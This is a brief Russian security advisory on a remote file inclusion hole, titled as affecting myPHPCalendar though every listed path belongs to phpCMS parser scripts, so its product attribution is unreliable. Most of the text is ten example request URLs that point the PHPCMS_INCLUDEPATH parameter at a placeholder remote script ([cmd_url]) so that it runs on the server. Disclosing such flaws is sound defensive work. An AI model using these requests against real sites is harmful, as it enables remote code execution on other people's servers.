Программа: myPHPCalendar

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "PHPCMS_INCLUDEPATH" множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://www.example.com/[pc_path]/parser/include/class.parser_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.session_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.edit_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.http_indexer_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.cache_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.search_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.lib_indexer_universal_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.layout_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/plugs/counter.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/parser.php?PHPCMS_INCLUDEPATH=[cmd_url]/

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии